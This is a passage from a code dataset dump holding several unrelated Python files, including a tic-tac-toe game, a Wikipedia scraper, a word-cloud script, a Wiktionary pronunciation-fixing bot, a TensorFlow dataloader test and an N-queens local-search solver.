'snew')\nbou9.config(command=lambda:buclick(9))\n\n\n#--------------------------------------------------------------\n\ndef buclick(id):\n\tglobal ActivePlayer\n\tglobal P1\n\tglobal P2\n\n\tif(ActivePlayer ==1):\n\t\tsetlayout(id,'X')\n\t\tP1.append(id)\n\t\troot.title('Tic Tac Toy : Player 2')\n\t\tActivePlayer =2\n\n\n\telif(ActivePlayer ==2):\n\t\tsetlayout(id,'O')\n\t\tP2.append(id)\n\t\troot.title('Tic Tac Toy : Player 1')\n\t\tActivePlayer =1\n\n\tif len(P1) or len(P2)>2:\n\t\tCheckWiner()\n#--------------------------------------------------------\n\ndef setlayout(id,text):\n if(id==1):\n \tbou1.config(text=text)\n \tbou1.state(['disabled'])\n\n elif(id==2):\n \tbou2.config(text=text)\n \tbou2.state(['disabled'])\n\n elif(id==3):\n \tbou3.config(text=text)\n \tbou3.state(['disabled'])\n\n elif(id==4):\n \tbou4.config(text=text)\n \tbou4.state(['disabled'])\n\n elif(id==5):\n \tbou5.config(text=text)\n \tbou5.state(['disabled'])\n\n elif(id==6):\n \tbou6.config(text=text)\n \tbou6.state(['disabled'])\n\n elif(id==7):\n \tbou7.config(text=text)\n \tbou7.state(['disabled'])\n\n elif(id==8):\n \tbou8.config(text=text)\n \tbou8.state(['disabled'])\n \n elif(id==9):\n \tbou9.config(text=text)\n \tbou9.state(['disabled'])\n\n\n\n#---------------------------------------------------------------------\n\ndef CheckWiner():\n\twiner= -1\n\n\tif((1 in P1) and(2 in P1) and(3 in P1)):\n\t\twiner =1\n\tif((1 in P2) and(2 in P2) and(3 in P2)):\n\t\twiner =2\n\n\n\n\tif((4 in P1) and(5 in P1) and(6 in P1)):\n\t\twiner =1\n\tif((4 in P2) and(5 in P2) and(6 in P2)):\n\t\twiner =2\n\n\n\tif((7 in P1) and(8 in P1) and(9 in P1)):\n\t\twiner =1\n\tif((7 in P2) and(8 in P2) and(9 in P2)):\n\t\twiner =2\n\n\n\n\tif((1 in P1) and(4 in P1) and(7 in P1)):\n\t\twiner =1\n\tif((1 in P2) and(4 in P2) and(7 in P2)):\n\t\twiner =2\n\n\n\tif((2 in P1) and(5 in P1) and(8 in P1)):\n\t\twiner =1\n\tif((2 in P2) and(5 in P2) and(8 in P2)):\n\t\twiner =2\n\n\n\tif((3 in P1) and(6 in P1) and(9 in P1)):\n\t\twiner =1\n\tif((3 in P2) and(6 in P2) and(9 in P2)):\n\t\twiner =2\n\n\n\n\tif((1 in P1) and(5 in P1) and(9 in P1)):\n\t\twiner =1\n\tif((1 in P2) and(5 in P2) and(9 in P2)):\n\t\twiner =2\n\n\n\tif((3 in P1) and(5 in P1) and(7 in P1)):\n\t\twiner =1\n\tif((3 in P2) and(5 in P2) and(7 in P2)):\n\t\twiner =2\n\n\t\n\tif winer ==1:\n\t\tmessagebox.showinfo(title='Cong',message='Player 1 is winer')\n\n\tif winer ==2:\n\t\tmessagebox.showinfo(title='Cong',message='Player 2 is winer')\n\t\n \n\t\n \n\n\t\t\n\nroot.mainloop()\n","sub_path":"tic tac toy .py","file_name":"tic tac toy .py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"490540990","text":"'''\nCreated on 16.02.2010\n \n@author: Dmytro Korsakov\n'''\n \nimport unittest\nimport os\nfrom scalarizr.bus import bus\nfrom scalarizr.handlers import apache\nfrom szr_unittest import RESOURCE_PATH\nfrom scalarizr.config import ScalarizrCnf\n \nfrom szr_unittest_libs.mock import QueryEnvService\nfrom scalarizr.queryenv import VirtualHost\n \n \nclass Test(unittest.TestCase):\n \n def setUp(self):\n bus.etc_path = os.path.join(RESOURCE_PATH, 'etc')\n cnf = ScalarizrCnf(bus.etc_path)\n cnf.load_ini('app')\n bus.cnf = cnf\n self._cnf = bus.cnf\n \n bus.base_path = os.path.realpath(RESOURCE_PATH + \"/../../..\")\n bus.share_path = os.path.join(bus.base_path, 'share')\n \n bus.queryenv_service = qe\n bus.define_events(\"before_host_down\", \"init\")\n \n '''\n config = bus.config\n self.vhosts_path = config.get('behaviour_app','vhosts_path')\n self.httpd_conf_path = config.get('behaviour_app','httpd_conf_path')\n '''\n \n def _test_cleanup(self):\n old_vhost = self.vhosts_path + \"/test.vhost\"\n if not os.path.exists(self.vhosts_path):\n os.makedirs(self.vhosts_path)\n open(old_vhost,'w').close\n self.assertTrue(os.path.exists(old_vhost))\n \n test_vhost = self.vhosts_path + \"/test-example.scalr.net-ssl.vhost.conf\"\n if os.path.exists(test_vhost):\n os.remove(test_vhost)\n self.assertFalse(os.path.exists(test_vhost))\n \n bus.queryenv_service = qe\n a = apache.ApacheHandler()\n a.on_VhostReconfigure(\"\")\n \n self.assertFalse(os.path.exists(old_vhost))\n self.assertTrue(os.path.exists(test_vhost))\n self.assertEqual(os.listdir(self.vhosts_path),['test-example.scalr.net-ssl.vhost.conf'])\n \n httpd_conf_file = open(self.httpd_conf_path, 'r')\n text = httpd_conf_file.read()\n index = text.find('Include ' + self.vhosts_path + '/*')\n self.assertNotEqual(index, -1)\n \nvhost = VirtualHost(\n hostname = \"test-example.scalr.net\",\n type = \"apache\",\n raw= \"\"\"\nDocumentRoot /var/www/1/\nServerName test-example.scalr.net\nCustomLog /var/log/apache2/test-example.scalr.net-access.log1 combined\n# CustomLog /var/log/apache2/test-example.scalr.net-access.log2 combined\nErrorLog /var/log/apache2/test-example.scalr.net-error.log3\n#ErrorLog /var/log/apache2/test-example.scalr.net-error.log4#\n# ErrorLog /var/log/apache2/test-example.scalr.net-error.log_5#\n# ErrorLog /var/log/apache2/test-example.scalr.net-error.log_6_#\n# Other directives here\n \n \"\"\",\n https = True)\n \nqe = QueryEnvService(\n list_virtual_hosts = list(vhost,),\n get_https_certificate = (\"MIICWjCCAhigAwIBAgIESPX5.....1myoZSPFYXZ3AA9kwc4uOwhN\",\"MIICWjCCAhigAwIBAgIESPX5.....1myoZSPFYXZ3AA9kwc4uOwhN\")\n)\n \nbus.queryenv_service = qe\n \n \nif __name__ == \"__main__\":\n unittest.main()\n \n","sub_path":"tests/unit/scalarizrtests/handlers/test_apache.py","file_name":"test_apache.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"311186015","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport logging\nimport wikipedia\n\n\n\"\"\"Scrapes Data about subject from various datasources\n\nArguments:\n subject (string): subject to search about\n data_sources (array): Array of strings of datasources\n\nExample Use:\n dataScrapper = DataScrapper(subject, [\"wikipedia\"])\n dataScrapper.collect_all_data()\n text, categories = dataScrapper.merge_and_get_all_collected_data()\n\nCustom DataSet:\n If you want to add custom data to include when creating a knowledge model\n place this in \n \n -> data/custom_data_source\n\n The name should be the same as the question or audience subject\n and the format needs to obey the following structure\n {\n \"content\": ,\n \"categories\": [\"array\", \"of\", \"stuff\"]\n }\n\n\"\"\"\nclass DataScrapper:\n \n def __init__(self, subject=None, data_sources=[\"wikipedia\"]):\n\n if (subject == None or data_sources == []):\n logging.error(\"Please provide subject to DataScrapper\")\n\n self.data_sources = data_sources\n self.subject = subject\n self.data = {}\n\n def merge_and_get_all_collected_data(self):\n if (self.data == {}):\n logging.info(\"No data scrapped yet for subject {}.\".format(self.subject))\n\n text = \"\"\n categories = []\n\n # Loop over data sources collected and add to content\n for key, value in self.data.items():\n if (self.data[key][\"content\"]):\n text += self.data[key][\"content\"]\n\n if (self.data[key][\"categories\"]):\n categories = categories + self.data[key][\"categories\"]\n\n return text, categories\n\n\n def collect_all_data(self):\n\n # Loop over datasources to collect data\n for data_source in self.data_sources:\n \n if (data_source == \"wikipedia\"):\n logging.debug(\"Collecting data for {} from wikipedia\".format(self.subject))\n self._build_profile_from_wikipedia()\n\n elif (data_source == \"britannica\"):\n logging.debug(\"Collecting data for {}from britannica - NOTE: NOT IMPLEMENTED\".format(self.subject))\n self._build_profile_from_britannica()\n\n elif (data_source == \"biography\"):\n logging.debug(\"Collecting data for {}from biography - NOTE: NOT IMPLEMENTED\".format(self.subject))\n self._build_profile_from_biography()\n\n elif (data_source == \"custom\"):\n logging.debug(\"Collecting data for {}from biography - NOTE: NOT IMPLEMENTED\".format(self.subject))\n self._build_profile_from_custom()\n\n else:\n logging.info(\"\")\n\n # --- Internal Methods ---\n\n def _build_profile_from_wikipedia(self):\n wiki_data_set = {}\n wiki_suggestions = wikipedia.search(self.subject)\n\n # try except in case the first entity doesnt lead to a valid search\n try:\n wiki_entity = wiki_suggestions[0]\n logging.debug(\"Scrapping for \" + wiki_entity)\n\n wiki_categories = wikipedia.page(wiki_entity).categories\n wiki_content = wikipedia.page(wiki_entity).content\n\n wiki_data_set = {\n \"suggestions\" : wiki_suggestions,\n \"categories\" : wiki_categories,\n \"content\" : wiki_content\n }\n except:\n wiki_entity = wiki_suggestions[1]\n\n wiki_categories = wikipedia.page(wiki_entity).categories\n wiki_content = wikipedia.page(entity).content\n\n wiki_data_set = {\n \"suggestions\" : wiki_suggestions,\n \"categories\" : wiki_categories,\n \"content\" : wiki_content\n }\n\n print(wiki_data_set)\n\n self.data[\"wikipedia\"] = wiki_data_set\n\n def _build_profile_from_britannica(self):\n logging.debug(\"Still need to implement this method\")\n\n def _build_profile_from_biography(self):\n logging.debug(\"Still need to implement this method\")\n\n def _build_profile_from_custom(self):\n data = None\n my_file = Path(\"data/custom_data_source/\" + self.subject.replace(\" \", \"_\") + \".json\")\n\n if my_file.is_file():\n with open(\"data/custom_data_source/\" + self.subject.replace(\" \", \"_\") + \".json\") as file:\n data = json.load(file)\n\n if (data == None):\n logging.error(\"Knowledge base does not exist in file system\")\n\n return {\n \"categories\" : data.categories,\n \"content\" : data.content\n }","sub_path":"classes/DataScrapper.py","file_name":"DataScrapper.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"98129985","text":"#!/usr/bin/env python3\n\n'电影评论词云图'\n\nimport logging\nimport pandas as pd\nimport jieba\nimport pickle\nfrom os import path\nimport matplotlib.pyplot as plt\n# https://www.lfd.uci.edu/~gohlke/pythonlibs/ wordcloud下载\nfrom wordcloud import WordCloud,STOPWORDS,ImageColorGenerator\n\n\nlogging.basicConfig(level=logging.ERROR)\n\ndf=pd.read_csv('hidden_man_norepeat.csv',encoding='gb18030')\n\ncomment=df['评论'].tolist()\n# 查看里面字符串换行的编码:发现是/r/r/n\nlogging.info(comment[1].encode('gbk'))\n\n# 替换掉换行\ncomment=list(map(lambda x:x.replace('\\r\\r\\n',''),comment))\n\n# 截词\ncomment_cut=jieba.cut(str(comment),cut_all=False)\n\n# for i in range(6):\n# logging.info(next(comment_cut))\n# INFO:root:[\n# INFO:root:'\n# Building prefix dict from the default dictionary ...\n# DEBUG:jieba:Building prefix dict from the default dictionary ...\n# Loading model from cache C:\\Users\\Peter\\AppData\\Local\\Temp\\jieba.cache\n# DEBUG:jieba:Loading model from cache C:\\Users\\Peter\\AppData\\Local\\Temp\\jieba.cache\n# Loading model cost 1.404 seconds.\n# DEBUG:jieba:Loading model cost 1.404 seconds.\n# Prefix dict has been built succesfully.\n# DEBUG:jieba:Prefix dict has been built succesfully.\n# INFO:root:完全\n# INFO:root:不\n# INFO:root:知道\n# INFO:root:演\n\n# 将词连接成字符串\nword_space_split=\" \".join(comment_cut)\n\n# 导入背景图\nbackground_image=plt.imread('./WeChat Image_20180727141117.jpg')\nstopwords=STOPWORDS.copy()\n# 可以加多个屏蔽词\nfor i in [\"电影\",\"姜文\",\"彭于\",\"真的\",\"有点\",\"廖凡\",\"演技\",\"演员\",\"超级\",\"但是\",\"就是\",\"剧情\",\"一个\",\"一部\",\"看到\",\"还是\",\"不是\",\"什么\",\"感觉\",\"这部\",\"子弹\",\"片子\"]:\n stopwords.add(i)\n# 设置词云参数 \n# 参数分别是指定字体、背景颜色、最大的词的大小、使用给定图作为背景形状\nwc = WordCloud(width=1024,height=768,background_color='white',mask=background_image,font_path = 'simhei.ttf',stopwords=stopwords,max_font_size=400,random_state=50)\n# wc.generate_from_text(\"中国 中国 北京 珠海 珠海 珠海 深圳\")\nwc.generate_from_text(word_space_split)\n\n# 从背景图中取色\nimg_colors= ImageColorGenerator(background_image)\nwc.recolor(color_func=img_colors)\n\n# 保存结果到本地\nwc.to_file('hm.jpg')\n\nplt.imshow(wc)\nplt.axis('off') # 不显示坐标轴 \nplt.show()\n\n","sub_path":"python-sample/scraping/maoyan/hm_wordcloud.py","file_name":"hm_wordcloud.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"256677413","text":"from ircbot import Irc\nimport time \nimport threading\nimport Queue\n\nexitFlag = 0\n\nclass Control(threading.Thread):\n\n\tdef __init__(self, threadID, name, config, queue, func):\n\t\tthreading.Thread.__init__(self)\n\t\tself.threadID = threadID\n\t\tself.name = name\n\t\tself.config = config\n\t\tself.queue = queue\n\t\tself.func = func\n\t\n\tdef run(self):\n\t\tself.func()\n","sub_path":"lib/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"118748670","text":"# -*- coding: utf-8 -*-\n\nimport re,urlparse\n\nfrom module.plugins.internal.SimpleCrypter import SimpleCrypter\nfrom module.plugins.internal.SimpleHoster import parse_fileInfo\n\nclass EbookhellTo(SimpleCrypter):\n __name__ = \"EbookhellTo\"\n __type__ = \"crypter\"\n __version__ = \"0.01\"\n __pattern__ = r'https?://(www\\.)?ebook-hell.to/.+'\n __description__ = \"\"\"ebook-hell.to decrypter plugin\"\"\"\n __config__ = [(\"hostersInParallel\", \"1;2;3;all\", \"How many to use in parallel\", \"all\"),\n (\"readPackageName\", \"bool\", \"Search package/folder name on the website\", \"True\")]\n __authors__ = [(\"zapp-brannigan\", \"\")]\n\n NAME_PATTERN = r'TITLE=\"Cover:\\s*(?P.+?)[\\n\"]'\n LINK_PATTERN = r'HREF=\"(?P.+?)\" TARGET=\"_blank\">= 97 and self.letterList[i] <= 122:\r\n self.letterList[i] = chr(self.letterList[i]-32)\r\n runErrorCheck = False\r\n elif self.letterList[i] >= 48 and self.letterList[i] <= 57:\r\n self.letterList[i] = chr(self.letterList[i])\r\n runErrorCheck = False\r\n elif self.letterList[i] == 8:\r\n self.letterList = self.letterList[:-2]\r\n runErrorCheck = False\r\n else:\r\n self.letterList = self.letterList[:-1]\r\n except:\r\n pass\r\n if len(self.letterList) >= 7:\r\n self.letterList = self.letterList[:-1]\r\n self.string = ''.join(self.letterList)\r\n generateText(self.string, self.textRect[0], self.textRect[1], (0, 0, 0), self.fontSize)\r\n def update(self):\r\n if self.backgroundRect.collidepoint(mousePosition):\r\n if mousePress[0] == True:\r\n self.displayBox = True\r\n if not self.backgroundRect.collidepoint(mousePosition):\r\n if mousePress[0] == True:\r\n self.displayBox = False\r\n if self.displayBox == True:\r\n self.displayInputBox()\r\n self.inputAccepted = True\r\n if self.displayBox == False:\r\n if not len(self.letterList) > 0:\r\n self.displayInputText()\r\n else:\r\n self.getLetters = False\r\n self.displayInputBox()\r\n self.printLetters()\r\n self.inputAccepted = False\r\n if self.inputAccepted == True:\r\n self.getLetters = True\r\n self.printLetters()\r\n\r\ndef generateText(text, xpos, ypos, color, fontSize):\r\n font = pygame.font.Font(None, fontSize)\r\n text = font.render(text, 1, color)\r\n textpos = text.get_rect()\r\n if type(xpos) == str:\r\n if xpos == 'center':\r\n textpos.x = (width/2)-textpos.width/2\r\n if xpos == 'left':\r\n textpos.x = 40\r\n if xpos == 'right':\r\n textpos.x = 480-textpos.width-10\r\n elif type(xpos) == int:\r\n textpos.x = xpos\r\n if type(ypos)== str:\r\n if ypos == 'center':\r\n textpos.y = 720/2-textpos.height\r\n elif type(ypos) == int:\r\n textpos.y = ypos\r\n screen.blit(text, textpos)\r\n\r\ndef check():\r\n global runErrorCheck, acceptedWord, realWord\r\n runErrorCheck = False\r\n acceptedWord = False\r\n runErrorCheck = True\r\n realWord = False\r\n check = carPlateRegistrationSystem.check()\r\n if check.word(inputBox.string.lower()) == True:\r\n realWord = True\r\n if check.wordLength(inputBox.string) == False:\r\n generateText('Word length must be equal to six characters.', 'center', 80, (255, 0, 0), 16)\r\n elif check.registered(inputBox.string) == True:\r\n generateText('Name already registered.', 'center', 80, (255, 0, 0), 16)\r\n elif check.restricted(inputBox.string.lower()) == True:\r\n generateText('Restricted name.', 'center', 80, (255, 0, 0), 16)\r\n elif accepted == True:\r\n generateText('Registered!', 'center', 80, (0,0,0), 16)\r\n else:\r\n generateText('Accepted!', 'center', 80, (0, 200, 0), 16)\r\n return True\r\n \r\ndef register():\r\n global runErrorCheck, totalPrice\r\n accepted = True\r\n carPlateRegistrationSystem.writeFile(inputBox.string)\r\n runErrorCheck = False\r\n if realWord == True:\r\n totalPrice += 110\r\n else:\r\n totalPrice += 70\r\n print('$' + str(totalPrice))\r\n \r\ndef update():\r\n global mousePosition, mousePress, keys, accepted\r\n keys = pygame.key.get_pressed()\r\n mousePosition = pygame.mouse.get_pos()\r\n mousePress = pygame.mouse.get_pressed()\r\n screen.fill((255, 255, 255))\r\n objects.update()\r\n if runErrorCheck == True:\r\n if check() == True:\r\n registerButton.update()\r\n pygame.display.update()\r\n\r\ndef price():\r\n pass\r\nrunErrorCheck = False\r\nacceptedWord = False\r\naccepted = False\r\n\r\ntotalPrice = 0\r\n\r\nquitButton = button('Quit', 'center', 170, (0, 0, 0), (200, 200, 200), (0,0,0), 16, 'pygame.quit()', 'sys.exit()')\r\ncheckButton = button('Check availabilty', 220, 50, (0,0,0), (200,200,200), (0,0,0), 16, 'check()')\r\nregisterButton = button('Register plate', 'center', 107, (0,0,0), (200,200,200), (0,0,0), 16, 'register()')\r\ninputBox = inputText(100, 50, 100, 'Type here...', (100,100,100), (200, 200, 200), (0, 0, 0), 16)\r\nobjects = pygame.sprite.Group()\r\nobjects.add(quitButton)\r\nobjects.add(checkButton)\r\nobjects.add(inputBox)\r\n\r\n\r\nwhile True:\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n if inputBox.getLetters == True:\r\n if event.type == pygame.KEYDOWN:\r\n inputBox.letterList.append(event.key)\r\n \r\n update()\r\n\r\n","sub_path":"Code/Pygame Based/20140403/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":9096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"548025770","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pywikibot, re, sys, argparse\n\nimport blib\nfrom blib import getparam, rmparam, tname, pname, msg, errandmsg, site\n\ndef process_page(page, index, line, respelling, orig_template, repl_template,\n args):\n pagetitle = str(page.title())\n def pagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n\n if respelling == \"-\":\n pagemsg(\"Skipping line with respelling '-': %s\" % line)\n return\n\n if respelling == \"\":\n pagemsg(\"WARNING: Skipping blank respelling: %s\" % line)\n return\n\n notes = []\n\n text = str(page.text)\n if orig_template not in text:\n pagemsg(\"WARNING: Can't find original template %s in text\" % orig_template)\n return\n\n m = re.search(\"^.*?%s.*$\" % re.escape(orig_template), text, re.M)\n if not m:\n pagemsg(\"WARNING: Couldn't find template %s in page text\" % orig_template)\n textline = \"(unknown)\"\n else:\n textline = m.group(0)\n\n m = re.search(r\"(\\|pos=[a-z]+)\", repl_template)\n if m:\n posarg = m.group(1)\n else:\n posarg = \"\"\n if respelling == \"y\":\n respellingarg = \"\"\n else:\n respellingarg = \"|\" + \"|\".join(respelling.split(\",\"))\n real_repl = \"{{fr-IPA%s%s}}\" % (respellingarg, posarg)\n\n if \"{{a|\" in textline:\n pagemsg(\"WARNING: Replacing %s with %s and saw accent spec on line: %s\" % (\n orig_template, real_repl, textline))\n\n newtext, did_replace = blib.replace_in_text(text, orig_template,\n real_repl, pagemsg)\n text = newtext\n if did_replace:\n notes.append(\"semi-manually replace %s with %s\" % (orig_template, real_repl))\n if respelling != \"y\":\n parsed = blib.parse_text(text)\n saw_fr_conj_auto = False\n for t in parsed.filter_templates():\n tn = tname(t)\n if tn == \"fr-conj-auto\":\n if saw_fr_conj_auto:\n pagemsg(\"WARNING: Saw {{fr-conj-auto}} twice, first=%s, second=%s\" % (\n saw_fr_conj_auto, str(t)))\n saw_fr_conj_auto = str(t)\n if getparam(t, \"pron\"):\n pagemsg(\"WARNING: Already saw pron= param: %s\" % str(t))\n continue\n pronarg = \",\".join(pron or pagetitle for pron in respelling.split(\",\"))\n origt = str(t)\n t.add(\"pron\", pronarg)\n pagemsg(\"Replaced %s with %s\" % (origt, str(t)))\n notes.append(\"add pron=%s to {{fr-conj-auto}}\" % pronarg)\n text = str(parsed)\n\n return text, notes\n\nparser = blib.create_argparser(\"Push manual {{fr-IPA}} replacements for {{IPA|fr}}\")\nparser.add_argument(\"--direcfile\", help=\"File of directives\", required=True)\nargs = parser.parse_args()\nstart, end = blib.parse_start_end(args.start, args.end)\n\nfor index, line in blib.iter_items_from_file(args.direcfile, start, end):\n m = re.search(r\"^(.*?)\\|Page [0-9]+ (.*?): WARNING: Can't replace (\\{\\{IPA\\|fr\\|.*?\\}\\}) with (\\{\\{.*?\\}\\}) because auto-generated pron .*$\", line)\n if not m:\n errandmsg(\"Line %s: Unrecognized line: %s\" % (index, line))\n continue\n respelling, page, orig_template, repl_template = m.groups()\n def do_process_page(page, index, parsed):\n return process_page(page, index, line, respelling, orig_template,\n repl_template, args)\n blib.do_edit(pywikibot.Page(site, page), index, do_process_page,\n save=args.save, verbose=args.verbose, diff=args.diff)\n","sub_path":"push_manual_fr_pronun_fixes.py","file_name":"push_manual_fr_pronun_fixes.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"405532698","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n\"\"\"\n@author: 桂引暄\n\npart4: 统计\n\"\"\"\nimport pandas as pd\nimport BasicInfo as bs\nfrom TreeBuild import *\n\nglobal Elist\nElist=[\"小学\", \"初中\", \"高中\", \"本科\", \"研究生\", \"博士\"]\n#最大公约数\ndef gcd(a,b):\n if a= rows\n assert rows == (60 * 24 * 3 + 1)\n\n # if num_samples is equal to batch size,\n # we didn't exhaust the iterator and do\n # cleanup. Try that now\n if num_samples == batch_size:\n try:\n next(data_itr)\n except StopIteration:\n pass\n else:\n raise ValueError\n assert not data_itr._working\n assert data_itr._batch_itr is None\n\n # check start of next epoch to ensure consistency\n X, y = next(data_itr)\n for _y, _y0 in zip(y, y0):\n assert (_y.numpy() == _y0.numpy()).all()\n\n for column, x in X.items():\n x0 = X0.pop(column)\n assert (x.numpy() == x0.numpy()).all()\n assert len(X0) == 0\n\n data_itr.stop()\n assert not data_itr._working\n assert data_itr._batch_itr is None\n","sub_path":"tests/unit/test_tf_dataloader.py","file_name":"test_tf_dataloader.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"176514945","text":"\"\"\" Change all Image Filenames from name.jpeg to name_0.jpeg \"\"\"\nfrom config.config import cfg_path, cfg_model\nimport os\n\npath_images = cfg_path['images'] + 'all'\nlabel_directories = os.listdir(path_images)\n\nfor label in label_directories:\n for image in os.listdir(path_images + os.path.sep + label):\n if '_0' not in image:\n new_prefix = image.split(\".\")[0] + \"_0\"\n new_name = new_prefix + \".jpeg\"\n os.rename(\n path_images + os.path.sep + label + os.path.sep + image,\n path_images + os.path.sep + label + os.path.sep + new_name)\n","sub_path":"transfer_learning/db/snapshot_wisconsin/change_image_file_names.py","file_name":"change_image_file_names.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"206157656","text":"\n# coding: utf-8\n\n# In[276]:\n\n\nfrom numpy import *\nimport random\nimport operator\nfrom copy import deepcopy\n\n\n# In[277]:\n\n\nsize = 1000\nqueen_mat = mat(zeros((size, size)), dtype=int)\n# print(queen_mat)\n\n\n# In[278]:\n\n\nrandom_order = list(range(0, size))\nrandom.shuffle(random_order)\n# print(random_order)\npos = deepcopy(random_order)\n\n\n# In[279]:\n\n\n# print(queen_mat[0,0])\n\n\n# In[280]:\n\n\n# queen_mat[0,0] = 1\ndef draw_mat(pos, size):\n _mat = mat(zeros((size, size)), dtype=int)\n for i in range(0, size):\n _mat[i, pos[i]] = 1\n print(_mat)\n \n# draw_mat(pos, size)\n\n\n# In[281]:\n\n\ndef check_pos(x, size, pos):\n conflicts = 0\n y = pos[x]\n for i in range(0, size):\n if i != x:\n j = x+y-i\n if j in range(0, size) and pos[i] == j:\n conflicts += 1\n j = y - (x - i)\n if j in range(0, size) and pos[i] == j:\n conflicts += 1\n if pos[i] == y:\n conflicts += 1\n\n return conflicts\n\n# In[282]:\n\n\ndef cal_conflict(pos, size, conflict=None):\n if conflict is None:\n conflict = dict()\n for i in range(0, size):\n conflict[i] = check_pos(i, size, pos)\n# print(conflict)\n return conflict\n \n# print(cal_conflict(pos, size))\n\n\n# In[283]:\n\n\ndef sum_conflict(conflict):\n return sum(list(conflict.values()))\n\n\ndef swap_rows(pos, i, j):\n pos[i], pos[j] = pos[j], pos[i]\n\n\ndef modify_conflict_with_swap(conflict, pos, x1, x2, size):\n old_x1 = conflict[x1]\n old_x2 = conflict[x2]\n if old_x1 != check_pos(x1, size, pos) or old_x2 != check_pos(x2, size, pos):\n print(\"Err\")\n y1 = pos[x1]\n y2 = pos[x2]\n t = 0\n for i in range(0, size):\n if i != x1 and i != x2:\n j1 = x1 + y1 - i\n if j1 in range(0, size) and pos[i] == j1:\n conflict[i] -= 1\n t -= 1\n j1 = y1 - (x1 - i)\n if j1 in range(0, size) and pos[i] == j1:\n conflict[i] -= 1\n t -= 1\n j2 = x2 + y2 - i\n if j2 in range(0, size) and pos[i] == j2:\n conflict[i] -= 1\n t -= 1\n j2 = y2 - (x2 - i)\n if j2 in range(0, size) and pos[i] == j2:\n conflict[i] -= 1\n t -= 1\n pos[x1] = y2\n pos[x2] = y1\n y1 = pos[x1]\n y2 = pos[x2]\n for i in range(0, size):\n if i != x1 and i != x2:\n j1 = x1 + y1 - i\n if j1 in range(0, size) and pos[i] == j1:\n conflict[i] += 1\n t += 1\n j1 = y1 - (x1 - i)\n if j1 in range(0, size) and pos[i] == j1:\n conflict[i] += 1\n t += 1\n j2 = x2 + y2 - i\n if j2 in range(0, size) and pos[i] == j2:\n conflict[i] += 1\n t += 1\n j2 = y2 - (x2 - i)\n if j2 in range(0, size) and pos[i] == j2:\n conflict[i] += 1\n t += 1\n conflict[x1] = check_pos(x1, size, pos)\n conflict[x2] = check_pos(x2, size, pos)\n t += conflict[x1] - old_x1 + conflict[x2] - old_x2\n # print(\"modified: \", t)\n return t\n\n\ndef modify_conflict_with_move(conflict, pos, x, new_y, size):\n old_y = pos[x]\n old_conflicts = conflict[x]\n t = 0\n if old_y == new_y:\n return 0\n for i in range(0, size):\n if i != x:\n j = x + old_y - i\n if j in range(0, size) and pos[i] == j:\n conflict[i] -= 1\n t -= 1\n j = old_y - (x - i)\n if j in range(0, size) and pos[i] == j:\n conflict[i] -= 1\n t -= 1\n if pos[i] == old_y:\n conflict[i] -= 1\n t -= 1\n pos[x] = new_y\n for i in range(0, size):\n if i != x:\n j = x + new_y - i\n if j in range(0, size) and pos[i] == j:\n conflict[i] += 1\n t += 1\n j = new_y - (x - i)\n if j in range(0, size) and pos[i] == j:\n conflict[i] += 1\n t += 1\n if pos[i] == new_y:\n conflict[i] += 1\n t += 1\n conflict[x] = check_pos(x, size, pos)\n t += conflict[x] - old_conflicts\n return t\n\n\ndef local_search(size, pos, sum_of_conflict, conflict=None):\n if conflict is None:\n conflict = cal_conflict(pos, size)\n\n new_conflict = sum_of_conflict\n print(\"sum_of_conflicts\",sum_of_conflict, end=\" \")\n if sum_of_conflict == 0:\n return 0\n \n # sorted_conflict = sorted(conflict.items(), key=operator.itemgetter(1), reverse=True)\n # max_x = max(*conflict.items(), key=operator.itemgetter(1))[0]\n # x1 = max_x\n # print(\"max_x: \", max_x)\n # print(pos)\n # print(sorted_conflict)\n # ################\n # x1 = sorted_conflict[0][0]\n # max_x = sorted_conflict[0][0]\n x1 = random.choice(list(range(0, size)))\n print(\"x1: \", x1)\n min_conflicts = check_pos(x1, size, pos)\n origin_conflicts = min_conflicts\n min_y = pos[x1]\n old_y = pos[x1]\n some_choices = list()\n for new_y in range(0, size):\n pos[x1] = new_y\n new_conflicts = check_pos(x1, size, pos)\n if new_conflicts <= min_conflicts:\n min_conflicts = new_conflicts\n min_y = new_y\n some_choices.append(new_y)\n if min_conflicts == origin_conflicts:\n min_y = random.choice(some_choices)\n # pos[x1] = old_y\n # return 1\n pos[x1] = old_y\n modified = modify_conflict_with_move(conflict, pos, x1, min_y, size)\n new_conflict += modified\n return new_conflict\n\n # swap_rows(pos, x1, random.choice(list(range(0, size))))\n # print(\"random\")\n # modify_conflict_with_swap(conflict, pos, x1, random.choice(list(range(0, size))), size)\n # # return local_search(size, pos, conflict)\n # return sum_conflict(conflict)\n # ###########################\n # for new_y in range(0, size):\n # modify_conflict_with_move(conflict, pos, max_x, new_y, size)\n # if sum_conflict(conflict) < sum_of_conflict:\n # return sum_conflict(conflict)\n # # else:\n # # modify_conflict_with_move(conflict, pos, max_x, new_y, size)\n # # swap_rows(pos, x1, 